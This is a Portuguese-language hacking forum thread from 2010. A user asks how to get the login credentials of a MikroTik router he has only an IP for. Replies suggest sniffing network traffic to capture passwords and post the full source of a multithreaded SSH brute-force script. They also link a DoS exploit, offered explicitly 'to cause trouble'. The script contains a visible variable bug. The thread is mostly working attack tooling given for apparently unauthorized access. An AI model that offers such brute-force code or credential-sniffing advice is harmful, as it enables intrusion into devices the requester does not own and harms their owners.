Resultados 1 a 4 de 4
  1. 26 Feb 2010, 16:31 #1
    thyti
    thyti está desconectado
    Lamer
    Data de Ingresso
    Sep 2009
    Posts
    16

    [Ajuda] mikrotik [Resolvido]

    galera alguem sabe como descobrir nome de usuário e senha que dão acesso a um mikrotik? tenho o IP do bicho aqui, mas quando digito aparece a uma pagina pedindo nome de usuario e senha para navegar nele. se alguem souber como descobrir a senha e usuario ou tiver alguma indicação de um bruter force por favor passe pra mim. aguardo...
    Responder com Citação Responder com Citação
  2. 26 Feb 2010, 17:40 #2
    souzadc
    souzadc está desconectado
    Administrador Administrador Avatar de souzadc
    Data de Ingresso
    Jan 2005
    Localização
    BA - Salvador Capital City
    Posts
    5.867
    Enviar mensagem por MSN para souzadc

    Re: [ajuda] mikrotik

    Cara,

    Amigo thyti,

    Duas opções para você.

    01 - Procurar no google informações sobre esse sistema estudando e procurando entender e obter o maior número de informações possíveis.

    02 - Usar um sniffer de rede, afim de capturar informações quando as mesmas forem digitadas. Isso pode demorar ou não ou simplesmente não consiga nada, mais é o meio mais rápido para colher informações como senhas e logins.

    Sem mais!!!
    :arrow:

    Dúvidas somente no fórum, NÃO respondo via MP's, MSN, Orkut, E-mail e afins. Obrigado!
    Responder com Citação Responder com Citação
  3. 26 Feb 2010, 17:48 #3
    R0Dr1g0.
    R0Dr1g0. está desconectado
    Moderador Avatar de R0Dr1g0.
    Data de Ingresso
    Jul 2009
    Posts
    4.595
    Enviar mensagem por MSN para R0Dr1g0.

    Re: [ajuda] mikrotik

    Desculpa mas meu conhecimento é meio limitado sobre os roteadores mikrotik(prometo adquirir mais conhecimento sobre o mesmo) ,mas pelo que sei ele pode ser acessado por SSH e pelo Winbox
    Procurei por algum Bruteforcer para SSH
    achei o
    mtsshbruteforce.py
    Código:
    #!/usr/bin/env python
import sys, time
from threading import Thread

try:
    from paramiko import SSHClient
    from paramiko import AutoAddPolicy
except ImportError:
    print '''
    You need paramiko module.
    http://www.lag.net/paramiko/    
    Debian/Ubuntu: aptitude install python-paramiko\n'''
    sys.exit(1)


def license():
    '''Print the usage license to this software, yeah, it's the same as above'''
    print '''
    mtsshbrute.py - Simple multithreaded ssh brute force.
    Copyright (C) 2009  Ulisses "thebug" Castro (http://ulissescastro.wordpress.com)

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>
    '''


class BruteForce(Thread):
    def __init__(self, username, password, target, port, timeout):
        super(BruteForce, self).__init__()

        self.__port   = port
        self.target   = target
        self.password = password
        self.user     = user
        self.timeout  = timeout
        self.status   = 'unknown'


    def run(self):
        '''
        Create SSH connection to target
        '''
        ssh = SSHClient()
        ssh.set_missing_host_key_policy(AutoAddPolicy())
        try:
            ssh.connect(self.target, port = self.__port, username = self.user, password = self.password, pkey=None, timeout = self.timeout, allow_agent=False, look_for_keys=False)
            self.status = 'ok'
            ssh.close()
        except Exception, e:
            self.status = 'error'
            pass


def makelist(file):
    '''
    Make lists
    '''
    items = []

    try:
        fd = open(file, 'r')
    except IOError:
        print 'unable to read file \'%s\'' % file
        pass

    except Exception, e:
        print 'unknown error'
        pass

    for line in fd.readlines():
        item = line.replace('\n', '').replace('\r', '')
        items.append(item)

    return items


if __name__ == '__main__':
    from optparse import OptionError
    from optparse import OptionParser
    
    
    version = '''----------------------------------------------------------------------
 Multithreaded SSH Brute Force 
 Version 0.2                                  uss.thebug[at]gmail.com
----------------------------------------------------------------------'''

    usage = '%s [-H target] [-p port] [-U userslist] [-P wordlist] [-T threads] [-w timeout] [-v]' % sys.argv[0]

    parser = OptionParser(version=version, usage=usage)

    parser.add_option('-H', dest='target', help='hostname/ip')
    parser.add_option('-p', type='int', dest='port', default=22, help='port (default:%default)')
    parser.add_option('-U', dest='userlist', help='userlist file')
    parser.add_option('-P', dest='passlist', help='passwordlist file')
    parser.add_option('-T', type='int', dest='threads', default=16, help='number of connections in parallel (%default threads)')
    parser.add_option('-w', type='int', dest='timeout', default=30, help='defines the max wait time in seconds for responses (%default secs)')
    parser.add_option('-v', '--verbose', action='store_true', dest='verbose', help='verbose')
    parser.add_option('-l', '--license', action='store_true', dest='license', help='license')

    (options, args) = parser.parse_args()

    if options.license:
        license()
        sys.exit(0)

    if not options.target or not options.userlist or not options.passlist:
        parser.print_help()
        sys.exit(1)

    target = options.target
    port = options.port
    users = options.userlist
    passwords = options.passlist
    threads = options.threads
    timeout = options.timeout
    
    results = []
    tcounter = 0

    userlist = makelist(users)
    passwordlist = makelist(passwords)

    print "[*] SSH Brute Force Ninja"
    print "[*] %s user(s) loaded." % str(len(userlist))
    print "[*] %s password(s) loaded." % str(len(passwordlist))
    print "[*] Brute Force started."

    for user in userlist:
        for password in passwordlist:
            current = BruteForce(user, password, target, port, timeout)
            results.append(current)
            current.start()
            tcounter += 1
            if options.verbose:
                print "   [+] user: %s" % user + "  password: %s\n" % password,
            if tcounter == threads:
                for result in results:
                    result.join()
                    if result.status == 'error':
                        pass
                    else:
                        print "\n[*] got it!"
                        print "[*] user: %s" % result.user
                        print "[*] password: %s\n" % result.password
                        sys.exit(0)
                tcounter = 0
    
    print "[*] Done.\n"
    sys.exit(0)
    Lembrando que ataques por brute force pode ser MUITO demorados,então eu seguiria a dica do souzadc em usar um sniffer de rede.

    Agora se quer causar um transtorno com um ataque DoS tem esse exploit no Milw0rm
    http://www.milw0rm.com/exploits/5054

    Abraços
    MP Com dúvidas e pedidos de ajudas serão IGNORADAS
    "Mentes fracas não pensam,corpos fracos não lutam."
    Microsoft Technology Associate: Software Development Fundamentals (C#
    )
    Responder com Citação Responder com Citação
  4. 26 Feb 2010, 20:42 #4
    thyti
    thyti está desconectado
    Lamer
    Data de Ingresso
    Sep 2009
    Posts
    16

    Re: [ajuda] mikrotik

    valeu, muito obrigado pelas dicas, vou tentar um sniffer
    Responder com Citação Responder com Citação
« Tópico Anterior | Próximo Tópico »

Tópicos Similares

  1. DÚVIDA - Sniffer do Mikrotik
    Por Barack no fórum Servidores - Sistemas Operacionais
    Respostas: 3
    Último Post: 25 Apr 2011, 16:30
  2. Sistema Mikrotik
    Por DOGN no fórum Dúvidas Gerais
    Respostas: 7
    Último Post: 05 Aug 2010, 14:04
  3. Servidor mikrotik
    Por kaic.mistery no fórum Servidores - Sistemas Operacionais
    Respostas: 6
    Último Post: 20 Sep 2009, 14:34

Permissões de Postagem

  • Você não pode iniciar novos tópicos
  • Você não pode enviar respostas
  • Você não pode enviar anexos
  • Você não pode editar suas mensagens
  •  

Regras do Fórum